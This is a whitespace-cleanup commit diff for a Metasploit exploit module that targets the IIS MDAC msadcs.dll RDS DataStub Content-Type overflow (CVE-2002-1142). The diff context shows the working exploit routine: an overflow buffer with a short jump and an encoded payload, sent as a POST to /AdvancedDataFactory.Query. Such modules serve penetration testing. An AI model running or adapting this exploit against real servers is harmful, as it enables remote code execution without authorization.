Get rid of some whitespace

unstable
sinn3r 2012-06-07 12:17:25 -05:00
parent e12cce775e
commit 42795fec00
1 changed files with 5 additions and 7 deletions

View File

@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize
super(
'Name' => 'Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow',
'Description' => %q{
'Description' => %q{
This module can be used to execute arbitrary code on IIS servers
that expose the /msadc/msadcs.dll Microsoft Data Access Components
(MDAC) Remote Data Service (RDS) DataFactory service. The service is
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
['BID', '6214'],
['CVE', '2002-1142'],
['MSB', 'ms02-065'],
['URL', 'http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html'],
['URL', 'http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html']
],
'Privileged' => false,
'Payload' =>
@ -79,10 +79,8 @@ class Metasploit3 < Msf::Exploit::Remote
else
Exploit::CheckCode::Safe
end
end
def exploit
sploit = rand_text_alphanumeric(136)
sploit[24,2] = Rex::Arch::X86.jmp_short(117)
@ -90,14 +88,14 @@ class Metasploit3 < Msf::Exploit::Remote
sploit << payload.encoded
data = 'Content-Type: ' + sploit
res = send_request_raw({
'uri' => datastore['PATH'] + '/AdvancedDataFactory.Query',
'headers' =>
{
'Content-Length' => data.length,
},
'method' => 'POST',
'data' => data,
})